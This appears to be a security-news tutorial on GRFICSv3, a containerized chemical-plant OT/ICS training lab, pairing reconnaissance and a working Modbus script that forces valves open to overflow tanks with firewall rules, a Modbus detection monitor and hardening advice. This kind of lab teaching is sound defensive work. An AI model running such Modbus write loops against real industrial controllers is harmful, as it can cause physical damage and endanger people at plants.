
Introduction:
Operational Technology (OT) and Industrial Control Systems (ICS) form the backbone of modern civilization—power grids, water treatment facilities, chemical plants, and manufacturing lines all depend on them. Yet these environments remain dangerously exposed, with legacy protocols like Modbus lacking basic authentication and air gaps dissolving into convenience-driven network connections. The barrier to learning OT security has traditionally been brutal: physical PLC racks cost tens of thousands of dollars, and real industrial testbeds are inaccessible to most educators, students, and self-directed learners. GRFICSv3 (Graphical Realism Framework for Industrial Control Simulation Version 3) demolishes this wall entirely—a fully containerized, open-source OT security lab that simulates an entire chemical plant inside Docker, complete with 3D visualization, real industrial protocols, and integrated attack-and-defense tooling.
Learning Objectives:
- Deploy a complete OT/ICS security laboratory on a local machine using Docker Compose, eliminating the need for expensive hardware
- Execute reconnaissance, enumeration, and process manipulation attacks against a realistic chemical plant simulation
- Implement defensive controls including firewall rules, intrusion detection system (IDS) configuration, and network segmentation following the Purdue Model
- Identify physical security vulnerabilities and cyber hygiene failures through first-person virtual walkthroughs
- Automate adversary emulation using MITRE Caldera with OT-specific plugins
You Should Know:
1. GRFICSv3 Architecture: The Digital Chemical Plant in a Container
GRFICSv3 is not a toy—it is a full-fledged cyber-physical simulation that brings together realistic process dynamics, industrial protocols (Modbus TCP), engineering workstations, Human-Machine Interfaces (HMIs), Programmable Logic Controllers (PLCs), and attacker infrastructure all inside Docker containers. The environment models a chemical plant with tanks, valves, and a continuous process where manipulating control logic produces visible consequences in the 3D Unity-based visualization.
The architecture follows the Purdue Model for ICS networking:
- ICS Network (192.168.95.0/24): Contains the PLC (192.168.95.2), simulation engine (192.168.95.45), and engineering workstation (192.168.95.5)
- DMZ Network (192.168.90.0/24): Hosts the Kali attacker container (192.168.90.6)
- Router/Firewall: Runs iptables and Suricata IDS, controlling all traffic between zones
Every component is launched with a single command: docker compose up -d. The entire industrial environment—valves, tanks, PLC logic, HMI screens, and attack infrastructure—springs to life in your browser.
Step‑by‑Step Installation:
Prerequisites: Linux (native, VM, or WSL2) with Docker and Docker Compose.

```bash
# Remove conflicting packages (Debian/Ubuntu)
sudo apt remove docker.io docker-compose docker-compose-v2 docker-doc podman-docker containerd runc

# Install Docker from the official repository
sudo apt update
sudo apt install ca-certificates curl
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc
# Add the repository and install the engine plus the compose plugin (the steps that
# follow the key download in Docker's own Ubuntu instructions)
echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update
sudo apt install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin

# Clone and launch GRFICSv3
git clone https://github.com/Fortiphyd/GRFICSv3.git
cd GRFICSv3
docker compose up -d
docker compose ps   # verify every container shows "Up"
```
Access the HMI at `http://localhost:8080` and the attacker workstation at `http://localhost:8081`. The 3D plant visualization renders directly in your browser, showing tank levels, valve positions, and real-time process responses.
2. Reconnaissance and Enumeration: Mapping the Industrial Network
Before launching any attack, intelligence gathering is paramount. As the Stuxnet campaign demonstrated, the exploitation is the last mile—reconnaissance is the actual work. In GRFICSv3, the Kali container sits on the DMZ network, providing a realistic starting point for enumeration.
Step‑by‑Step Network Mapping:
From the Kali attacker container, begin with passive observation and progress to active scanning:
```bash
# Enter the Kali container
docker exec -it <kali-container-id> /bin/bash

# Scan the DMZ network (where you already are)
# 502 = Modbus/TCP, 102 = ISO-TSAP (S7comm), 44818 = EtherNet/IP, 4840 = OPC UA, 8080 = HMI web UI
nmap -Pn -sT -T2 --max-retries 1 -p502,8080,102,44818,4840 192.168.90.0/24

# Traceroute to identify network boundaries
traceroute 192.168.95.2

# Scan through the router into the ICS network
nmap -sT -T2 --max-retries 1 -p502,8080,102,44818,4840 192.168.95.0/24
```
The Modbus TCP protocol (port 502) is almost always exposed in these environments. In GRFICSv3, the router forwards traffic by default (FORWARD ACCEPT), enabling scanning across network boundaries. A successful scan reveals PLCs, HMIs, and engineering workstations—often with default credentials and no authentication required.
Modbus Discovery Script:
```python
from pymodbus.client import ModbusTcpClient

# Candidate hosts on the ICS network; a completed TCP handshake on 502 is
# enough to confirm a Modbus listener, since the protocol has no login step.
CANDIDATES = ["192.168.95.2", "192.168.95.10", "192.168.95.11", "192.168.95.12", "192.168.95.13"]

# Scan for Modbus devices
for ip in CANDIDATES:
    client = ModbusTcpClient(ip, port=502, timeout=1)
    if client.connect():
        print(f"[+] Modbus device found at {ip}")
        client.close()
```
3. Process Manipulation: Making the Tanks Overflow
The most vivid learning experience in GRFICSv3 is watching your attack succeed in real-time 3D. By overwriting PLC control values, you can force valves open or closed, causing tank levels to rise until chemical product overflows—all visible in the browser.
Step‑by‑Step Modbus Attack Execution:
The following Python script, executed from the Kali attacker container, continuously writes valve positions to override legitimate PLC control logic:
```python
import time
from pymodbus.client import ModbusTcpClient


def main():
    interval = 0.0005  # 0.5 ms: shorter than the PLC control cycle, so the PLC's own writes never win
    unit_id = 247
    address = 1
    # Target: Valve A (open 100%), Valve B (open 100%), Purge Valve (closed), Product Valve (closed)
    targets = [
        ("192.168.95.10", 502, 65535),  # Valve A - full open
        ("192.168.95.11", 502, 65535),  # Valve B - full open
        ("192.168.95.12", 502, 0),      # Purge Valve - closed
        ("192.168.95.13", 502, 0),      # Product Valve - closed
    ]
    clients = [ModbusTcpClient(host, port=port, timeout=2) for host, port, _ in targets]
    for c in clients:
        c.connect()
    # Continuously overwrite PLC values to maintain attack state
    while True:
        for c, (_, _, value) in zip(clients, targets):
            # `slave=` is the pymodbus 3.x keyword for the unit id; check the
            # signature of your installed release if it raises a TypeError
            c.write_registers(address, [value], slave=unit_id)
        time.sleep(interval)


if __name__ == "__main__":
    main()
```
Save this as `attack_modbus.py` on the attacker machine and execute with python3 attack_modbus.py. Watch the 3D visualization as tank pressure rises and chemical product begins to overflow.
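What the `write_registers` call above actually puts on the wire, and why the reconnaissance section could call Modbus unauthenticated: this is an added example, not code from GRFICSv3 or pymodbus. It hand-builds the Write Multiple Registers (FC16) and Read Holding Registers (FC3) request frames and parses them back. The MBAP header carries only a transaction id, protocol id, length and unit id; there is no field in which a credential could even travel. The unit id 247, register address 1 and value 65535 mirror the attack script; the frames are constructed here, not captured.

```python
import struct

# Modbus/TCP ADU = 7-byte MBAP header + PDU.  Added illustration, not project code.
MBAP_LEN = 7                       # transaction(2) protocol(2) length(2) unit(1)
FC_READ_HOLDING = 0x03
FC_WRITE_MULTIPLE = 0x10
WRITE_FUNCTIONS = {0x05, 0x06, 0x0F, 0x10}   # single/multiple coil and register writes


def _mbap(transaction_id, unit_id, pdu):
    # MBAP length counts the unit-id byte plus the PDU that follows it
    return struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id) + pdu


def build_write_registers(transaction_id, unit_id, start_addr, values):
    """Encode a Write Multiple Registers (FC16) request; 1..123 registers per frame."""
    if not 1 <= len(values) <= 123:
        raise ValueError("FC16 allows 1..123 registers per request")
    pdu = struct.pack(">BHHB", FC_WRITE_MULTIPLE, start_addr, len(values), 2 * len(values))
    pdu += b"".join(struct.pack(">H", v & 0xFFFF) for v in values)
    return _mbap(transaction_id, unit_id, pdu)


def build_read_holding(transaction_id, unit_id, start_addr, count):
    """Encode a Read Holding Registers (FC3) request."""
    return _mbap(transaction_id, unit_id, struct.pack(">BHH", FC_READ_HOLDING, start_addr, count))


def parse_request(adu):
    """Decode a request ADU into a dict; raise ValueError on a malformed frame."""
    if len(adu) < MBAP_LEN + 1:
        raise ValueError("short frame")
    tid, pid, length, unit = struct.unpack(">HHHB", adu[:MBAP_LEN])
    if pid != 0:
        raise ValueError("protocol id must be 0 for Modbus")
    if length != len(adu) - 6:          # length covers everything after the length field
        raise ValueError("MBAP length does not match frame size")
    pdu = adu[MBAP_LEN:]
    fc = pdu[0]
    req = {"transaction_id": tid, "unit_id": unit, "function": fc, "is_write": fc in WRITE_FUNCTIONS}
    if fc == FC_WRITE_MULTIPLE:
        start, qty, nbytes = struct.unpack(">HHB", pdu[1:6])
        if nbytes != 2 * qty or len(pdu) != 6 + nbytes:
            raise ValueError("FC16 byte count inconsistent with register quantity")
        req["address"] = start
        req["values"] = list(struct.unpack(">%dH" % qty, pdu[6:]))
    elif fc == FC_READ_HOLDING:
        req["address"], req["count"] = struct.unpack(">HH", pdu[1:5])
    else:
        req["raw_pdu"] = pdu[1:].hex()
    return req


if __name__ == "__main__":
    frame = build_write_registers(1, 247, 1, [65535])   # "open Valve A 100%" as the script sends it
    print(frame.hex())
    print(parse_request(frame))
```

Nothing in the parsed dictionary identifies the sender; a PLC that accepts this frame from the engineering workstation accepts it from the Kali container too, which is why the defensive controls in the next section have to live in the network path rather than in the protocol.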
4. Defensive Controls: Firewall Rules and Suricata IDS
Every attack in GRFICSv3 can be detected and mitigated. The environment includes a custom firewall and Suricata IDS interface, providing hands-on defensive training.
Step‑by‑Step Mitigation with iptables:
Implement rate-limiting and access controls on the OT gateway to block reconnaissance and attack traffic:
```bash
# Caveat: on the OT gateway, traffic crossing from the DMZ to the ICS network
# traverses the FORWARD chain. INPUT only sees packets addressed to the router
# itself, so the first two rules protect the router, not the PLCs behind it.

# Rate-limit Modbus connections (max 3 simultaneous from a single source)
sudo iptables -A INPUT -p tcp --dport 502 -m connlimit --connlimit-above 3 --connlimit-mask 32 -j DROP

# Log suspicious Modbus traffic for analysis
sudo iptables -A INPUT -p tcp --dport 502 -j LOG --log-prefix "MODBUS_SCAN: "

# Block unauthorized subnets from accessing Modbus
sudo iptables -A FORWARD -p tcp --dport 502 -s 192.168.1.0/24 -j DROP

# Allow only specific engineering workstations; the ACCEPT must precede the
# catch-all DROP because iptables evaluates rules in order
sudo iptables -A FORWARD -p tcp --dport 502 -s 192.168.95.5 -j ACCEPT
sudo iptables -A FORWARD -p tcp --dport 502 -j DROP
```
Suricata IDS Configuration:
Suricata runs inline between the DMZ and ICS networks, inspecting all traffic. To detect Modbus scanning:
```bash
# Verify Suricata is running
docker ps | grep suricata

# Check Suricata logs for alerts; look for entries indicating port scans or
# anomalous Modbus traffic
docker exec -it <suricata-container> cat /var/log/suricata/fast.log
```
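Suricata ships its own `modbus` rule keywords, but the logic a defender wants is easier to reason about in a few lines of code. The following is an added example, not part of GRFICSv3 or Suricata: a stateful monitor over decoded Modbus transactions that flags (a) any write function code from a source outside the engineering-workstation allowlist, (b) a write rate above what a legitimate HMI or workstation would ever produce, which is exactly the signature of the 0.5 ms write loop in the attack script, and (c) one source touching many distinct (host, unit id) endpoints, the signature of the enumeration step. The record layout, the allowlist, the thresholds and the sample transactions are all assumed or constructed for illustration.

```python
from collections import defaultdict, deque

WRITE_FUNCTIONS = {5, 6, 15, 16}   # write single/multiple coils and registers


class ModbusMonitor:
    """Stateful detector over decoded Modbus transactions (added example)."""

    def __init__(self, allowed_writers, max_writes_per_second=20, scan_threshold=4):
        self.allowed_writers = set(allowed_writers)
        self.max_rate = max_writes_per_second
        self.scan_threshold = scan_threshold
        self._writes = defaultdict(deque)   # src -> timestamps of writes within the last second
        self._targets = defaultdict(set)    # src -> (dst, unit) endpoints it has touched
        self._flagged = set()               # (kind, src) already reported, to avoid repeats

    def _once(self, kind, src, alerts, text):
        if (kind, src) not in self._flagged:
            self._flagged.add((kind, src))
            alerts.append(text)

    def observe(self, ts, src, dst, unit, function):
        """Process one transaction; return the alerts it raises (empty if benign)."""
        alerts = []
        self._targets[src].add((dst, unit))
        n = len(self._targets[src])
        if n >= self.scan_threshold:
            self._once("SCAN", src, alerts, f"SCAN {src} touched {n} Modbus endpoints")
        if function in WRITE_FUNCTIONS:
            if src not in self.allowed_writers:
                alerts.append(f"UNAUTHORIZED_WRITE {src} -> {dst} unit {unit} fc {function}")
            window = self._writes[src]
            window.append(ts)
            while ts - window[0] > 1.0:     # keep a one-second sliding window
                window.popleft()
            if len(window) > self.max_rate:
                self._once("WRITE_FLOOD", src, alerts,
                           f"WRITE_FLOOD {src}: {len(window)} writes within 1 s")
        return alerts


def sample_transactions():
    """Constructed records (timestamp, src, dst, unit_id, function), not a capture."""
    eng, kali = "192.168.95.5", "192.168.90.6"
    recs = [(0.0, eng, "192.168.95.2", 1, 3),      # workstation polls the PLC
            (0.5, eng, "192.168.95.2", 1, 16)]     # workstation pushes a setpoint
    hosts = ["192.168.95.2", "192.168.95.10", "192.168.95.11", "192.168.95.12", "192.168.95.13"]
    for i, host in enumerate(hosts):                # attacker enumerates five hosts
        recs.append((1.0 + 0.1 * i, kali, host, 247, 3))
    for k in range(50):                             # then hammers Valve A every 0.5 ms
        recs.append((2.0 + 0.0005 * k, kali, "192.168.95.10", 247, 16))
    return recs


def analyze(records=None, allowed=("192.168.95.5",)):
    """Run the monitor over a record list and return every alert in order."""
    monitor = ModbusMonitor(allowed)
    alerts = []
    for rec in (sample_transactions() if records is None else records):
        alerts.extend(monitor.observe(*rec))
    return alerts


if __name__ == "__main__":
    for line in analyze():
        print(line)
```

In a real deployment the records would come from Suricata's Modbus event log or a Zeek `modbus.log`, and the three alert kinds map onto the three controls in the iptables block: the allowlist onto the per-source ACCEPT/DROP pair, the flood onto `connlimit`, and the scan onto the LOG rule. The once-per-source suppression matters in practice: a 2 kHz write loop would otherwise produce 2,000 identical alerts per second.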
For Windows hosts running Docker Desktop, the equivalent host-level control is a Windows Defender Firewall rule created with the NetSecurity module. (The cmdlet is New-NetFirewallRule; New-NetIPsecRule configures IPsec connection security and has no -Action parameter.) Because explicit Block rules take precedence over Allow rules in Windows Firewall, rely on the default inbound Block policy and add only the allow rule:

```powershell
New-NetFirewallRule -DisplayName "Allow Only Engineering VLAN" -Direction Inbound -RemoteAddress 10.0.10.0/24 -Protocol TCP -LocalPort 502 -Action Allow
```
5. Physical Vulnerabilities and First-Person Walkthroughs
One of GRFICSv3’s most innovative pedagogical features is the first-person virtual walkthrough mode. You explore the plant and warehouse as if physically present, hunting for the classic security failures that plague real industrial environments:
- Passwords written on sticky notes attached to monitors
- Security doors propped open with fire extinguishers
- Unlocked control cabinets exposing network equipment
- Zero physical separation between IT and OT spaces
The “Vulnerabilities Found” counter in the top-left corner tracks discoveries and assigns a score—gamifying the learning experience. This approach bridges the gap between cyber and physical security, teaching that OT security is not just about firewalls and patches but also about physical access controls and human behavior.
6. MITRE Caldera Integration: Automating Adversary Emulation
GRFICSv3 natively integrates MITRE Caldera, a cybersecurity platform designed to automate adversary emulation, assist red teams, and automate incident response. The OT plugin extends Caldera with industrial protocols including BACnet, DNP3, Modbus, Profinet, and IEC61850.
Step‑by‑Step Caldera Automation:
1. Access the Caldera web interface (exposed on a configured port)
2. Create a new operation targeting the ICS network
3. Deploy adversary profiles that emulate real-world threat actors
4. Automate the attack chain: reconnaissance → initial access → command and control → impact
5. Monitor defensive responses and generate after-action reports
Caldera’s Debrief plugin provides campaign analytics and operational insights, making it invaluable for both training and red-team exercises. The combination of GRFICSv3’s realistic simulation with Caldera’s automation capabilities enables continuous security validation without risking physical equipment.
7. Hardening OT Networks: From Theory to Practice
The lessons learned in GRFICSv3 translate directly to real-world OT security practices. Following the ISA/IEC 62443 and NIST SP 800-82 frameworks, practitioners can implement compensatory controls:
Modbus Security (MBsec) Gateway:
Terminate Modbus/TCP Security (TLS with certificate-based authorization, on the IANA-assigned port 802) in front of a legacy device that speaks only plain Modbus on 502. The invocation below is illustrative; the daemon name and flags depend on the gateway product you deploy:

```bash
# Deploy a Modbus security gateway with authentication (illustrative invocation)
mbsecd --listen 802 --backend 192.168.1.10:502 --cert server.crt
```
Network Segmentation:
- Place all ICS devices on isolated VLANs
- Implement unidirectional gateways (data diodes) where possible
- Restrict engineering workstation access to specific IP ranges
- Deploy industrial IDS/IPS solutions like OsecT for protocol-aware monitoring
Continuous Monitoring:
- Log all Modbus transactions and alert on anomalous function codes
- Deploy Sigma rules for abnormal Modbus activity detection
- Implement asset discovery and inventory management
- Conduct regular vulnerability assessments using the GRFICSv3 lab as a safe testing ground
What Undercode Say:
- Key Takeaway 1: GRFICSv3 democratizes OT security education. What once required tens of thousands of dollars in hardware and access to physical industrial facilities can now be spun up on any laptop with Docker. The containerized architecture—moving from VirtualBox VMs in v2 to lightweight containers in v3—makes deployment faster, scaling easier, and maintenance simpler. This is not just a training tool; it is a paradigm shift in how we prepare the next generation of industrial cybersecurity professionals.
- Key Takeaway 2: The integration of offensive (Kali, Caldera) and defensive (Suricata, firewall) tooling within a single environment creates a complete cyber range. Learners can attack, defend, and iterate in minutes rather than days. The 3D visualization provides immediate feedback—you see the physical consequences of your actions, making abstract cyber concepts tangible. The first-person walkthrough mode adds a crucial layer: physical security is half the battle in OT environments, and GRFICSv3 teaches that lesson effectively.
Analysis: The release of GRFICSv3 by Fortiphyd Logic represents a maturation of the open-source OT security ecosystem. Previous versions were valuable but cumbersome; v3’s containerization makes it accessible to anyone with a modern laptop and an internet connection. The project addresses a critical gap in cybersecurity education: while thousands are trained to secure web applications and corporate networks, far fewer understand the unique challenges of protecting the systems that keep lights on, water flowing, and factories running. By making realistic OT training free and open, GRFICSv3 accelerates skill development and broadens the pipeline of qualified industrial security professionals. The gamification elements—vulnerability counters, scoring, visible process consequences—increase engagement and retention, particularly for self-directed learners.
Prediction:
- (+1) By 2028, AI-powered offensive tools will automate Modbus fuzzing and zero-day discovery in legacy PLCs, forcing a rapid decline in insecure "brownfield" deployments. Demand for professionals who mastered simulated labs like GRFICSv3 will push their compensation beyond traditional IT security salaries.
- (+1) Open-source OT simulation platforms will become the standard for industrial cybersecurity training, displacing proprietary, hardware-dependent courses. Organizations that adopt these tools will shorten incident response times from days to hours.
- (-1) The gap between simulated and physical training remains significant—pneumatic valves and real-world physics behave differently than simulated registers. Future practitioners must complement virtual drills with at least one real PLC bench to develop full competence.
- (-1) Legacy brownfield deployments—particularly in water utilities and energy sectors—will continue to operate with insecure protocols and unpatched vulnerabilities, creating persistent risk that no amount of simulation can immediately resolve.
Project Links & Resources:
- GRFICSv3 GitHub: https://github.com/Fortiphyd/GRFICSv3
- Installation Walkthrough Video: https://youtu.be/X7YYCLJxMmo
- GRFICSv3 Announcement: https://lnkd.in/erp2DbC2
- Fortiphyd Logic Learning Platform: https://learn.fortiphyd.com
Build. Break. Defend. Learn. And occasionally, make a chemical tank overflow without alerting anyone. 🧪
Reported By: Laurent Biagiotti – Hackers Feeds